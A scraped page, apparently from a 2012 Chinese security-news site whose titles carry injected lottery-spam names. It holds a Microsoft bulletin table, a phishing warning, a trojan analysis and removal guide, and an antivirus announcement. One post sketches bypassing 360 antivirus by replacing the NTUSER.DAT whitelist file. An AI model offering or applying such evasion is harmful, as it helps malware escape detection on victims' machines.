PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%"><strong>最高严重等级和漏洞影响</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top"><strong>重新启动要求</strong></td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top"><strong>受影响的软件</strong></td></tr></thead><tbody style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-064</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Microsoft Word&nbsp;中的漏洞可能允许远程执行代码&nbsp;(2742319)</strong>&nbsp;<br /><br />此安全更新解决&nbsp;Microsoft Office&nbsp;中两个秘密报告的漏洞。如果用户打开或预览特制的&nbsp;RTF文件,较严重的漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">严重&nbsp;<br />远程执行代码</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新启动</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office,&nbsp;<br />Microsoft Server&nbsp;软件</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-065</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Microsoft Works&nbsp;中的漏洞可能允许远程执行代码&nbsp;(2754670)</strong>&nbsp;<br /><br />此安全更新可解决&nbsp;Microsoft Works&nbsp;中一个秘密报告的漏洞。如果用户使用&nbsp;Microsoft Works打开特制&nbsp;Microsoft Word&nbsp;文件,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与当前用户相同的用户权限。那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />远程执行代码</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新启动</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-066</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>HTML&nbsp;清理组件中的漏洞可能允许特权提升&nbsp;(2741517)</strong>&nbsp;<br /><br />此安全更新可解决&nbsp;Microsoft Office、Microsoft Communications Platforms、Microsoft Server&nbsp;软件和&nbsp;Microsoft Office Web Apps&nbsp;中一个公开披露的漏洞。如果攻击者将特制内容发送给用户,则该漏洞可能允许特权提升。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />特权提升</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新启动</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office,&nbsp;<br />Microsoft&nbsp;服务器软件,&nbsp;<br />Microsoft Lync</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-067</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>FAST Search Server 2010 for SharePoint&nbsp;分析中的漏洞可能允许执行远程代码(2742321)</strong>&nbsp;<br /><br />此安全更新解决了&nbsp;Microsoft FAST Search Server 2010 for SharePoint&nbsp;中一个公开披露的漏洞。该漏洞可能允许使用受限制的令牌在用户帐户的安全上下文中远程执行代码。只有当启用高级筛选包时,FAST Search Server for SharePoint&nbsp;才会受影响。默认情况下,高级筛选包已禁用。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />远程执行代码</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">可能要求重新启动</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Office,&nbsp;<br />Microsoft Server&nbsp;软件</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-068</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Windows&nbsp;内核中的漏洞可能允许特权提升&nbsp;(2724197)</strong><br /><br />此安全更新解决了&nbsp;Microsoft Windows&nbsp;所有受支持的版本(Windows 8&nbsp;和&nbsp;Windows Server 2012&nbsp;除外)中一个秘密报告的漏洞。对于&nbsp;Windows XP、Windows Server 2003、Windows Vista、Windows Server 2008、Windows 7&nbsp;和&nbsp;Windows Server 2008 R2&nbsp;的所有受支持版本,此安全更新的等级为“重要”。&nbsp;<br /><br />如果攻击者登录系统并运行特制应用程序,则该漏洞可能允许提升特权。攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />特权提升</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">需要重启动</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Windows</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-069</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Kerberos&nbsp;中的漏洞可能允许拒绝服务&nbsp;(2743555)</strong>&nbsp;<br /><br />此安全更新可解决&nbsp;Microsoft Windows&nbsp;中一个秘密报告的漏洞。如果远程攻击者向&nbsp;Kerberos服务器发送特制会话请求,则该漏洞可能允许拒绝服务。采用防火墙最佳做法和标准的默认防火墙配置,有助于保护网络免受从企业外部发起的攻击。按照最佳做法,应使连接到&nbsp;Internet&nbsp;的系统所暴露的端口数尽可能少。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />拒绝服务</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">需要重启动</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Windows</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-070</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>SQL Server&nbsp;中的漏洞可能允许特权提升&nbsp;(2754849)</strong>&nbsp;<br /><br />此安全更新解决了运行&nbsp;SQL Server Reporting Services (SSRS)&nbsp;的系统上的&nbsp;Microsoft SQL Server&nbsp;中一个秘密报告的漏洞。该漏洞是一个跨站点脚本执行&nbsp;(XSS)&nbsp;漏洞,可能允许特权提升,使攻击者能够在目标用户的上下文中的&nbsp;SSRS&nbsp;站点上执行任意命令。攻击者可以通过向用户发送特制的链接并诱使用户单击该链接来利用此漏洞。攻击者还可以通过提供一个包含试图利用此漏洞的网页的网站来利用此漏洞。另外,接受或宿主用户提供的内容或广告的网站以及受到破坏的网站可能包含可能利用此漏洞的特制内容。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0cm; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0cm; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 119px; PADDING-TOP: 0cm; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">&nbsp;</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0cm; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0cm; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 0cm; BORDER-BOTTOM: windowtext 1pt solid" valign="top">&nbsp;</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0cm; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0cm; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 0cm; BORDER-BOTTOM: windowtext 1pt solid" valign="top">&nbsp;</td></tr></tbody></table> [防护教程]12306出现高仿虚假网站 请认准12306.cn-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17277_1.html 佚名 防护教程 2012/9/28 13:56:35 <p>国庆和中秋假期临近,网上预订火车票也进入高峰期。与此同时,360“网址云安全”监测发现,近两周来,订票钓鱼网站呈现明显上升趋势,一些不法分子甚至直接假冒中国铁路客户服务中心12306.cn网站,利用十分相似的域名迷惑用户,用户很容易因为输入错误而误入钓鱼网站。<br /></p><p><img alt="" src="https://pic.cr173.com/up/2012-9/2012092813572278580.jpg" /></p><p><strong>图1:360独家发现并拦截假冒中国铁路客户服务中心的网站</strong></p><p>  以360独家发现并拦截的www.12306.cm钓鱼网站为例,虽然有些网络安全常识的人都可以判断和区分真假,但由于其网站后缀“.cm”和铁路客户服务中心的后缀“.cn”非常相似,很难分辨。此外,在电脑键盘布局上“m”键和“n”键相邻,不小心输错网址的用户很容易误入该虚假网站。<br /><br /></p><p><img alt="" src="https://pic.cr173.com/up/2012-9/2012092813572374290.jpg" /></p><p><strong>图2:假“12306”破绽明显但域名迷惑性很高</strong></p><p>  目前,360浏览器及360安全卫士用户无需升级,即可拦截该钓鱼网站。同时,360安全浏览器标配的“网站名片”功能,可显示用户浏览的常见网站真实身份信息,准确帮用户甄别访问网站是否为钓鱼网站,建议绝大多数网民安装使用。<br /></p><p><img alt="" src="https://pic.cr173.com/up/2012-9/2012092813572368418.jpg" /></p><p><strong>图3:360安全浏览器“网站名片”可显示网站身份信息</strong></p><p>  同时,360安全专家也在此提醒广大网民,类似假冒网站还有www.12306.cn.com,铁道部官方售票渠道仅限www.12306.cn和电话95105105,目前并没有授权其他网站开展类似服务内容,网民请不要轻易点击或拨打网上搜到的购票网站或购票电话,以免遭受不必要的损失。</p> [安全产品]360白名单文件在哪、360白名单分析-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/17274_1.html 佚名 安全产品 2012/9/28 11:45:52 最近,在学习免杀这方面的知识。方便以后写壳。但是,360的云查杀。总是认为我的壳是病毒。。真心蛋疼、、、<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;于是,添加到了白名单。于是,就百度下360白名单文件。发现,竟然没人告诉我360白名单配置文件在那个位置。。。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;只好自己手动分析了。&nbsp;&nbsp;分析过程就不写了。</p><p>&nbsp;白名单的目录:</p><p>C:\Documents&nbsp;and&nbsp;Settings\Administrator\NTUSER.DAT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(隐藏文件,不可修改与删除)</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;知道了白名单的配置地址。那么,我们完全可以通过编程来实现修改360的白名单。加密算法不放出。&nbsp;给个简单的思路。直接替换掉ntuser.dat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;就可以无伤过360</p><p>{insd m=&quot;0&quot; i=&quot;11200&quot;}</p> [防护教程]CF三尸蛊木马手工清除教程-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/16851_1.html 佚名 防护教程 2012/9/4 13:46:30 <p>CF三尸蛊的手工处理这个病毒相当麻烦,因为病毒禁用了众多反病毒工具,打开就提示句柄错误。这个病毒禁用了大多数的杀软,导致杀软无法正常运行,目前只能手动处理,专杀将会尽快支持查杀。<br /><br />目前发现 gmer、rku 不在禁止列表,免于一死。<br /><br />gmer中文汉化版下载:<a href="http://www.pjyuanjian.com/soft/29375.html">http://www.pjyuanjian.com/soft/29375.html</a><br /><br /><strong>手工杀毒法<br /></strong>1、打开gmer--file--删除<br />c:\Windows\System32\safemon.dll<br />c:\Windows\System32\drivers\nthook.sys <br />c:\Windows\System32\drivers\beep.sys<br />存在则也删除<br />c:\Windows\System32\drivers\p2phook.sys<br /><br /><img alt="" src="https://pic.cr173.com/up/2012-9/201299441350108673.jpg" /><br /><br /><img alt="" src="https://pic.cr173.com/up/2012-9/201299441349565658.jpg" /><br /><br /><strong>2、使用bootice重置MBR (或者在dos下或者控制台重置mbr,命令是 fdisk /mbr)<br /><br /></strong><span style="font-size:18px;color:#ff0000;">重置MBR图文教程:</span><a href="http://www.pjyuanjian.com/html/16852_1.html"><span style="font-size:18px;color:#ff0000;">http://www.pjyuanjian.com/html/16852_1.html</span></a><br /><strong><br />3、新建以下文件夹占坑和免疫<br /></strong>c:\Windows\System32\safemon.dll<br />c:\Windows\System32\drivers\nthook.sys <br />c:\Windows\System32\drivers\p2phook.sys</p> [病毒漏洞]cf三尸蛊是什么?CF三尸蛊病毒之庖丁解牛-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/16849_1.html 佚名 病毒漏洞 2012/9/4 11:43:55 <p>&nbsp; 电脑管家云安全中心监测发现,近期一款名为“CF三尸蛊”的CF盗号木马四处蔓延。这是一款带驱动的MBR型木马,属于远控木马,隐藏性高、内部瓦解、持久性强。黑客通过CF游戏外挂捆绑此木马病毒进行盗号,CF游戏玩家需要提高警惕。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 该木马会感染系统文件,破坏用户的安全软件,收集用户信息,修改用户浏览器的主页,连接黑客远程计算机使用户电脑完全被黑客掌控。此外,黑客在外挂中捆绑的木马具有较高的隐蔽性,并且能够破坏部分杀毒软件的云查杀功能,当用户出现账号被盗情况之后,启动杀毒软件云查杀扫描,部分杀毒软件会出现连接失败等异常情况。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 该木马是怎样隐藏?怎样内部瓦解玩家电脑的呢?让我们一起透视它的行径。</p><p><strong><strong>透视1:三重保险——进入玩家电脑</strong></strong></p><p>为了确保木马成功进入玩家电脑,黑客使用了三重保险来保证木马自启动成功:修改用户系统的MBR即用户硬盘的主引导区记录,<strong>确保优先注册系统启动</strong>;感染beep.sys系统文件</p><p><img src="https://pic.cr173.com/up/2012-9/2012090411442632367.png" alt="" /></p><p>图1</p><p>创建木马驱动服务:释放cp.exe(功能以mima1用户运行程序)和拷贝自己到C:\Temp目录,创建mima1(Administrators权限)的用户。利用cp.exe Administrators权限断开用户网络和安装木马的驱动程序。</p><p><img src="https://pic.cr173.com/up/2012-9/2012090411442626495.png" alt="" /></p><p><img src="https://pic.cr173.com/up/2012-9/2012090411442699406.png" alt="" /></p><p>图2</p><p><br /></p><p>通过 IpConfig /Release 命令断网避免安全软件的云查,断网后安全木马驱动模块。</p><p><br /><strong>透视二:注入木马主体——散布“害虫”内部瓦解</strong></p><p>通过驱动程序来监视系统中部分进程的创建过程,并把safemon.dll(病毒释放的主模块)注入到所创建的进程中。以达到从内核全速瓦解玩家电脑的目的。过程如下:</p><p>①&nbsp;&nbsp;释放C:\\Windows\\System32\\safemon.dll(病毒主体文件).</p><p>②&nbsp;&nbsp;注册系统创建进程通知函数 PsSetCreateProcessNotifyRoutine,过滤部分进程的创建行为,对①中释放的safemon.dll进行注入。</p><p><strong>透视三:屏蔽安全软件云查杀——幽禁用户安全部队</strong></p><p>该木马一手在玩家电脑内核翻云覆雨,一手又想在电脑网络只手遮天。它屏蔽了一些安全软件的云查杀IP地址,使得安全软件部分功能失效,无法进行云查杀或更新。</p><p><strong>透视四:禁止用户浏览安全厂商网址——切断救援</strong></p><p>除了软化安全软件对自身的威胁,木马还防止用户自己去查询和求救。其主体safemon.dll 会修改用户浏览器主页,过滤部分安全软件厂商的网址,来禁止用户查询相关信息。让用户仿佛在一座孤岛上,绝望沦为“鱼肉”。</p><p><br /><strong>透视五:完美驱动级隐藏——立足长远包藏祸心</strong></p><p>为了持久地破坏用户电脑,成功远程控制,该木马还费尽心思,改头换面,释放并安装NtHook.sys驱动程序,主要是HOOK内核中文件与注册表操作函数以达到隐藏自己的目的。恣意来日方长的远程连接木马作者计算机,使用户计算机成为“肉机”。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;综上五种透视,CF外挂所捆绑的木马可不亚于CF激战本身。<a href="http://www.pjyuanjian.com/soft/11253.html" target="_blank"><span style="font-size:18px;">QQ</span></a><a href="http://www.pjyuanjian.com/soft/11253.html" target="_blank"><span style="font-size:18px;">电脑管家</span></a><span style="color:#cc0000;">安全中心提示广大游戏玩家,慎用外挂,安全游戏</span>。目前电脑管家已经成功拦截该木马,为你的激战保驾护航。</p> [安全产品]360杀毒4.0 云动版发布-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/16804_1.html 佚名 安全产品 2012/8/31 16:41:45 <p>360杀毒4.0 “云动”抢鲜版发布了!<br /><br /></p><p>360杀毒4.0“云动”以至轻至强的智能防御,至简灵动的用户界面,让您提前感受下一代杀毒软件带来的全新体验。<br /><br /></p><p>360杀毒3.0在不久前通过了全面严格的安全测试,成为首家进入Windows 8 应用商店的国产杀毒软件。360杀毒4.0不但全面继承了360杀毒3.0的优良品质,更是带来了创新的技术和功能特性 - 全新构建的监控防御架构,在不牺牲系统性能的前提下全面提升了对病毒拦截的灵敏度;内嵌360人工智能启发式引擎QVM第二代,杀毒更聪明;加强版沙箱,杜绝病毒感染与隐私泄露;小红伞与BitDefender引擎可同时开启,提供更加凌厉的查杀和监控能力;耳目一新的“云动”交互界面,让您在尽享安全之余,更能有便捷、愉悦的使用体验。<br /><br /></p><p>正因为4.0新版具有如此之多的功能和技术亮点,我们非常兴奋地邀请您抢鲜体验,并请您把您对产品的意见和建议告诉我们。</p><p><span style="font-size:18px;color:#ff0000;">360杀毒4.0 下载地址:</span><a href="http://www.pjyuanjian.com/soft/7096.html"><span style="font-size:18px;color:#ff0000;">http://www.pjyuanjian.com/soft/7096.html</span></a><br /><br /><strong>360杀毒4.0的主要亮点介绍如下:</strong></p><p><strong><br /></strong></p><p><strong>第二代QVM人工智能启发式引擎,杀毒更“聪明”</strong></p><p>人工智能启发式引擎QVM是360的独创技术,早在360杀毒3.0版时就已经加入了引擎体系,并作为检测新生病毒的利器备受赞誉。它基于人工智能算法,独具“自学习、自进化”优势,秒杀新生木马病毒,助力360杀毒获得AV-C国际评测查杀率第一。在4.0版本中,融合了人工智能及云安全技术的第二代QVM引擎首次亮相,对新生病毒的侦测能力显著提高。</p><p><strong><br 